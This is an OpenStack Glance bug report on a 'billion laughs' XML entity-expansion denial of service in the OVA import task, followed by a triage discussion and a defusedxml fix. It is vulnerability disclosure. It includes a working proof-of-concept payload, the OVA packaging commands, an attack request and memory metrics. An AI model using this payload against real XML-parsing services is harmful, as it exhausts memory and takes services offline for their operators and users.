Authenticated "Billion laughs" memory exhaustion / DoS vulnerability in ovf_process.py

Bug #1625402 reported by Charles Neill on 2016-09-20
24
This bug affects 3 people
Affects Status Importance Assigned to Milestone
Glance
Low
Unassigned
OpenStack Security Advisory
Undecided
Unassigned

Bug Description

Creating a task to import an OVA file with a malicious OVF file inside it will result in significant memory usage by the glance-api process.

This is caused by the use of the xml.etree module in ovf_process.py [1] [2] to process OVF images extracted from OVA files with ET.iterparse(). No validation is currently performed on the XML prior to parsing.

As outlined in the Python documentation, xml.etree is vulnerable to the "billion laughs" vulnerability when parsing untrusted input [3]

Note: if using a devstack instance, you will need to edit the "work_dir" variable in /etc/glance/glance-api.conf to point to a real folder.

-----------------------------------------
Example request
-----------------------------------------

POST /v2/tasks HTTP/1.1
Host: localhost:1338
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/json
User-Agent: python-requests/2.11.1
Content-Type: application/json
X-Auth-Token: [ADMIN TOKEN]
Content-Length: 287

{
    "type": "import",
    "input": {
        "import_from": "http://127.0.0.1:9090/laugh.ova",
        "import_from_format": "raw",
        "image_properties": {
            "disk_format": "raw",
            "container_format": "ova",
     "name": "laugh"
        }
    }
}

-----------------------------------------
Creating the malicious OVA/OVF
-----------------------------------------

"laugh.ova" can be created like so:

1. Copy this into a file called "laugh.ovf":
<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
 <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
]>
<lolz>&lol10;</lolz>

2. Create the OVA file (tarball) with the "tar" utility:

    $ tar -cf laugh.ova.tar laugh.ovf && mv laugh.ova.tar laugh.ova

3. (Optional) If you want to serve this from your devstack instance (as in the request above), run this in the folder where you created the OVA file:

    $ python -m SimpleHTTPServer 9090

-----------------------------------------
Performance impact
-----------------------------------------
Profiling my VM from a fresh boot:

$ vboxmanage metrics query [VM NAME] Guest/RAM/Usage/Free,Guest/Pagefile/Usage/Total,Guest/CPU/Load/User:avg
Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 13.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 2456680 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

After submitting this task twice (repeating calls to the above command):

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1989684 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 88.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1694080 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 83.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1426876 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 79.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 1181248 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 85.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 817244 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 84.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 548636 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

Object Metric Values
---------- -------------------- --------------------------------------------
devstack_devstack_1473967678756_60616 Guest/CPU/Load/User:avg 74.00%
devstack_devstack_1473967678756_60616 Guest/RAM/Usage/Free 118932 kB
devstack_devstack_1473967678756_60616 Guest/Pagefile/Usage/Total 0 kB

After submitting enough of these requests at once, glance-api runs out of memory and can't restart itself. Here's what the log looks like after the "killer request" [4]

-----------------------------------------
Mitigation
-----------------------------------------

Any instances of xml.etree should be replaced with their equivalent in a secure XML parsing library like defusedxml [5]

1: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L21-L24
2: https://github.com/openstack/glance/blob/master/glance/async/flows/ovf_process.py#L184
3: https://docs.python.org/2/library/xml.html#xml-vulnerabilities
4: https://gist.github.com/cneill/5265d887e0125c0e20254282a6d8ae64
5: https://pypi.python.org/pypi/defusedxml

-----------------------------------------
Other
-----------------------------------------
Thanks to Rahul Nair from the OpenStack Security Project for bringing the ovf_process file to my attention in the first place. We are testing Glance for security defects as part of OSIC, using our API security testing tool called Syntribos (https://github.com/openstack/syntribos), and Bandit (which was used to discover this issue).

description: updated
description: updated
description: updated

Since this report concerns a possible security risk, an incomplete security advisory task has been added while the core security reviewers for the affected project or projects confirm the bug and discuss the scope of any vulnerability along with potential solutions.

description: updated

It seems like the task api is admin only by default, so a vulnerable deployment also needs to have changed the task_add policy. Though this is likely a legitimate resource exhaustion denial of service vulnerability.

Can defusedxml works in place to process OVF files ?

I wonder if this really needs to be kept private since the issue has been discussed publicly on the #openstack-security channel ( http://eavesdrop.openstack.org/irclogs/%23openstack-security/%23openstack-security.2016-09-16.log.html#t2016-09-16T18:09:15 ).

Brian Rosmaita (brian-rosmaita) wrote :

Here's an unhelpful comment. The OVA extraction task is extremely brittle and subject to several known attack vectors, as stated on the spec, which is a public document:

http://specs.openstack.org/openstack/glance-specs/specs/mitaka/implemented/ovf-lite.html#security-impact

The OVA extraction task should only be used by administrators and trusted users.

The xml-entity-expansion attack isn't mentioned in the spec, though.

Changed in glance:
status: New → Opinion
importance: Undecided → Low
Nikhil Komawar (nikhil-komawar) wrote :

I will second what Brian said and my comments (if poster earlier) would have been along the same lines.

With the current state of tasks (no priority for their maintenance) and have been setup to be admin only by default and the task api marked as deprecated https://github.com/openstack/glance/blob/c5dcf9021af609b81edc4a22c38ddf7bdd440cee/glance/api/v2/tasks.py#L46-L52 , we need not fix these issues. Mind you, we may NEVER get rid of tasks API from the glance source tree.

But I'm not against giving a CVE notice for our ops friends who wish to use tasks api. So, that looks like a decent enough solution to this.

Besides, we can keep updating the spec with such details and add bug links to the same.

Nikhil Komawar (nikhil-komawar) wrote :

I've set the importance and status of the bug accordingly.

Nonetheless, I appreciate a "ton" for raising this issues and making the community more aware. I'm sure there is good level of sophistication involved while setting the tests and testing it.

Charles Neill (charles-neill) wrote :

Thanks for the feedback, all! I agree that this isn't the highest of priority since it's an admin-only function, but I think a CVE/OSSA would still be helpful to ensure that anyone unaware of the task API's deprecation can patch this issue.

One additional thing that might be worth considering is that, because images can be imported from non-HTTPS links, an attacker in between the Glance server and the server hosting the image could inject a malicious image through a man-in-the-middle attack. Since there is no cryptographic verification of the image, an attacker with control of the server hosting the image could also replace it with a malicious one without the Glance administrator's knowledge.

Nikhil Komawar (nikhil-komawar) wrote :

Yes, about the man-in-the-middle for copy-from/http location is indeed a real threat. But again, this is subject to your glance installation, configuration and network setup.

If ops think that man-in-the-middle is a threat to their deployment, they can be Conservative about the access to non-admin users for http based location imports. Also, one can choose to setup network ACLs to restrict access to known (published) images (like fedora, ubuntu, centos, openstack community app-catalog public links etc.)

Based on comment #3, it seems like this report is a B3 according to VMT taxonomy ( https://security.openstack.org/vmt-process.html#incident-report-taxonomy ). I've switched the task to Opinion until an OSSN is defined or not.

Changed in ossa:
status: New → Incomplete
status: Incomplete → Opinion
Travis McPeak (travis-mcpeak) wrote :

Yeah agreed, since it's non-default config this is OSSN territory. Also since the issue was discussed on IRC I think we can make it public (which expands the pool of people that can work on the note).

DefusedXML has never been added to G-R, so there is no safe way to parse untrusted XML. I don't remember what the blocker was... I'll post something on ML about it.

Jeremy Stanley (fungi) wrote :

Agreed on the already public nature of this, I've switched the status accordingly.

information type: Private Security → Public
Charles Neill (charles-neill) wrote :

I'm not sure I agree with the assessment that this isn't default functionality. The only thing required to enable the vulnerability is to specify an appropriate "work_dir" in Glance's configuration. If this is an unlikely or unreasonable thing to do, then I agree that this is a less severe issue.

It is admittedly admin-only functionality, may not be widely used, and might be seen as deprecated by the project team, but the documentation on Tasks (which is one mechanism at play in this bug) does not in any way note that it is pending deprecation [1]. Neither are OVA/OVF images mentioned as deprecated. There are public YouTube videos explaining how to import these images [2], suggesting that at least some people are interested in using this functionality.

Not trying to be alarmist, just trying to better understand the classification.

[1] http://developer.openstack.org/api-ref/image/v2/index.html?expanded=create-task-detail
[2] https://www.youtube.com/watch?v=_zyFzElwwW0

Jeremy Stanley (fungi) on 2016-09-28
description: updated
Jeremy Stanley (fungi) wrote :

Charles: It looks like consensus has formed around this being a risk in an "experimental" feature (the implementation was added with known security caveats and so limited to admin users until those could be solved). Rather than trying to get patches for it backported to earlier supported releases and a security advisory sent recommending applying those patches, a security note may be drafted better describing these risks so that deployers are more aware and can avoid them.

Charles Neill (charles-neill) wrote :

Okay, so it mainly comes down to the implemented spec describing it as experimental, and the reduced likelihood of exploit based on it being admin-only. Good to know for future bugs, thanks.

Travis McPeak (travis-mcpeak) wrote :

I don't think it matters how the feature is described in the spec. If it's on by default it's not experimental.

Restricted to admin definitely lowers impact though.

Ian Cordasco (icordasc) wrote :

So I'm confused. If something requires configuration before it will work, is that on by default?

work_dir defaults to none. That means it will not allow tasks to run by default. Is that default in a way that I'm not understanding?

Rahul U Nair (rahulunair) wrote :

Ian, so the only `configuration` that is needed is to set a work_dir for the glance service. The work_dir is used by the service for any sort of async operations it has to do on an image.
As by default in devstack, the glance work_dir is not writable, we have to set one but this feature(import OVA file task) is on by default. After a writable dir has been set, an admin can execute this attack.

In the spec even though some security considerations were raised, specifically on gzip expansion and tar privilege escalation, I couldn't find any discussions on attacks similar to the Billion laughs one. Also it has not been stated that, this feature is going to be deprecated, I feel it would be helpful for operators to know about this vulnerability, so that they can take the necessary action.

Ian Cordasco (icordasc) wrote :

> but this feature(import OVA file task) is on by default.

How is this on by default if you need to set the option in the config for it to work? Do you mean the API is something that you can send requests to?

What I keep hearing is "We can't exploit this without the default config but we consider this a higher priority because it's exploitable by default" and that's not making sense.

Charles Neill (charles-neill) wrote :

I guess what I was trying to get at was, you have to e.g. set usernames/passwords in your configuration files before services relying on Keystone become useful. But I don't think anyone would call defining such variables "non-default" behavior.

My uncertainty is this: is "work_dir" usually set by reasonable operators to make Glance work as expected? I imagine that Glance avoids setting a default because 1) it can trigger significant disk usage for whatever folder is selected, and 2) Glance can't always predict what device will be the right one to choose to accommodate that disk usage, so rather than accidentally filling e.g. your /usr/ drive, it forces you to define it yourself. This is similar to services not necessarily specifying defaults for Keystone creds, since it would be unreasonable to assume that "admin/admin" would work by default anyway.

Rahul U Nair (rahulunair) wrote :

What I understood from reading the glance config is that the option `work_dir` is used by the glance service for any async operation it has to do on images before the image is imported[1], this is not exclusive to the OVA import task. Thus the work_dir option may be set by the cloud operator for other reasons as well, not only to import an OVA image.

[1]. http://docs.openstack.org/mitaka/config-reference/image-service.html

Ian Cordasco (icordasc) wrote :

> But I don't think anyone would call defining such variables "non-default" behavior.

Charles, Glance doesn't require Keystone. That said, configuring the identity service is a far cry from setting up tasks to work. Beyond anecdotal from meetings where operators were asked "Do you use tasks?" and they say "I didn't know that existed" I don't know if operators supply every non-required configuration value.

You can also specify a location for glance to store images on the local filesystem, but if people are using ceph, swift, or vmware they're not going to specify that.

"It's optional but people fill in optional config values too" isn't sufficient to make this on by default.

> Thus the work_dir option may be set by the cloud operator for other reasons as well, not only to import an OVA image.

Rahul, every person on this thread associated with Glance has said exactly that. That still doesn't make this on by default (which is the point you and Charles are trying to push). Yes that means people may have a problem with this if they've enabled other tasks. Yes that's exactly what an OSSN would serve to address (educating folks about the potential for attacks by highly trusted users of the cloud if they're using a deprecated API).

Thanks everyone for all the thought and effort on this issue.

Here's a summary of the situation:

(1) the ova extraction task was introduced in mitaka
(2) the tasks api was made admin only by default in mitaka
(3) the ova extraction task is admittedly fragile and subject to various exploits
(4) there is an extra check in the task to make sure the context is admin before the task is executed [0,1]
(5) the task doesn't execute unless the work_dir (used only by tasks) is set

I think this leaves us in the situation that Nikhil described earlier, namely, that a security note is the correct course of action, mainly to remind operators to be careful in handling images from non-reputable sources.

[0] https://github.com/openstack/glance/blob/stable/mitaka/glance/async/flows/ovf_process.py#L91-L96
[1] https://github.com/openstack/glance/blob/stable/newton/glance/async/flows/ovf_process.py#L91-L96

Charles Neill (charles-neill) wrote :

@Brian: Thanks for the follow-up. I was just trying to figure out whether "work_dir" is commonly enabled by operators or not (which is kind of like asking you to look into an "operator crystal ball", I realize). I know that it must be specified manually, and that it would likely only be enabled if Tasks access was desired - I was just trying to assess whether enabling Tasks is something that happens 10% of the time or 90% of the time. At this point, barring any further comments, it seems the answer is that this is rare.

@Ian: We're not trying to push some hidden agenda here. I think my questions have been pretty clear, and focused on one thing: Is this something most reasonable operators enable? I can't quantify this bug's likelihood of impact if I don't at least have a fuzzy answer to that question. My goal was simply to understand how much exposure there is likely to be in the community, and to align the response we make with the actual risk that is presented. Based on what I've seen, an OSSN seems reasonable.

I bring up Keystone credentials (as used in many OpenStack services - not Glance, specifically) merely as an example of a configuration variable without a default value, but that would not make sense to leave undefined in 90% of situations. Without opinions from people more knowledgeable about Glance than myself, I can't make that determination.

My guess is that we are using incompatible definitions of the phrase "by default." My take is, if it enables functionality that most sane operators want/need, and is therefore defined in almost all cases, it is a de-facto default whether or not there is a sane default provided in the service's example configuration file. It seems your definition is "is this specified in the configuration file by default," which I already know the answer to (no). So far I have not received an explicit answer to my question, but as stated above, I guess I have to assume that this means operator usage is not common.

Ian Cordasco (icordasc) wrote :

> My guess is that we are using incompatible definitions of the phrase "by default." My take is, if it enables functionality that most sane operators want/need, and is therefore defined in almost all cases, it is a de-facto default whether or not there is a sane default provided in the service's example configuration file. It seems your definition is "is this specified in the configuration file by default," which I already know the answer to (no).

Right. I suspect that's why we seem to be talking past each other. "by default" means to me, there's a default in the config file such that this is always on even if the operator doesn't intend it to be.

You're asking for the % of operators using this and we have no way of knowing that.

> So far I have not received an explicit answer to my question, but as stated above, I guess I have to assume that this means operator usage is not common.

As I mentioned above, the only answer I can give you is based on anecdotal evidence of the "Tasks exists?" response from operators. Since this is wide open, you can post this to the openstack-operators list to see if people paying attention there will weigh in.

Charles Neill (charles-neill) wrote :

This bug involving tasks and "qemu-img" [1] seems to have been assigned a CVE and resulted in an OSSA. Curious what the difference is when both of these are resource exhaustion attacks achieved through the Glance tasks API. It was marked as "Critical" for Mitaka in that case.

[1]: https://bugs.launchpad.net/ossa/+bug/1449062

The difference is that the ova task wasn't introduced until mitaka, at the same time the tasks api was made admin-only by default.

Jeremy Stanley (fungi) wrote :

To a great extent this is determined by how fixable it is. If there are patches proposed which can non-disruptively mitigate this behavior in all supported stable branches of Glance, and if the Glance core reviewers and stable branch managers agree on the approach, the VMT may issue a security advisory. If not, something like this generally gets documented with a security note instead.

The bug for OSSA 2016-012 was being tracked primarily as a risk in Nova with functions that were not (nor intended to be) limited strictly to admins, but when similar behavior was found duplicated in Cinder and Glance the patches for Nova were ported to them for completeness and they were included in the advisory.

As to the Hemanth's choice of high/critical importance on the Glance bugtasks he added, I can only assume he was using them to indicate how soon he intended to push the patches through. I don't generally expect those to reflect the severity of a bug, but rather represent personal workflow. Different developer teams have different policies for their task tracking metadata however, so I won't presume to speak for Hemanth or the Glance team in this regard.

Charles Neill (charles-neill) wrote :

Thanks for your responses, Brian & Jeremy. I think I have a much better idea of the factors that determine risk/response from an OpenStack perspective after participating in this thread, and will keep them in mind for future bugs. Cheers!

Charles Neill (charles-neill) wrote :

Any new thoughts on this? Should I reach out to MITRE about getting a CVE assigned?

Ian Cordasco (icordasc) wrote :

Charles,

I thought the consensus here was to not request a CVE for this. Did I miss some update that has shifted the consensus?

Jeremy Stanley (fungi) wrote :

Anyone's welcome to request a CVE assignment for a bug report. The OpenStack VMT isn't going to request one themselves because they don't plan to issue an advisory about this one, and it doesn't look like there are plans for the Glance team to "fix" it anyway.

Patch uses https://pypi.python.org/pypi/defusedxml to address the "billion laughs" vulnerability:
https://review.openstack.org/#/c/537855/

Changed in glance:
milestone: none → queens-rc1
status: Opinion → In Progress
assignee: nobody → Vladislav Kuzmin (vkuzmin-u)

Reviewed: https://review.openstack.org/537855
Committed: https://git.openstack.org/cgit/openstack/glance/commit/?id=6e82ea023a63b74b49d94f4e65b0a7cd3e0c49f6
Submitter: Zuul
Branch: master

commit 6e82ea023a63b74b49d94f4e65b0a7cd3e0c49f6
Author: Vladislav Kuzmin <email address hidden>
Date: Thu Jan 25 15:11:39 2018 +0400

    Replace xml defusedxml

    xml was considered as vulnerable to different atacks.
    It is recommended to replace this library with defused_xml

    Change-Id: I2b146dc34ada37a3ed9ecf49513d024a8ca2fb19
    Related-Bug: #1625402

defusedxml specifically protects against the entity expansion attack that's the subject of this paticular bug, so closing it.

[0] https://pypi.python.org/pypi/defusedxml#id11

Changed in glance:
assignee: Vladislav Kuzmin (vkuzmin-u) → nobody
status: In Progress → Fix Released

Change abandoned by Vladislav Kuzmin (<email address hidden>) on branch: stable/pike
Review: https://review.openstack.org/539967
Reason: global-requirements for stable/pike doesn't contain defusedxml

To post a comment you must log in.
This report contains Public information  Edit
Everyone can see this information.

Duplicates of this bug

Other bug subscribers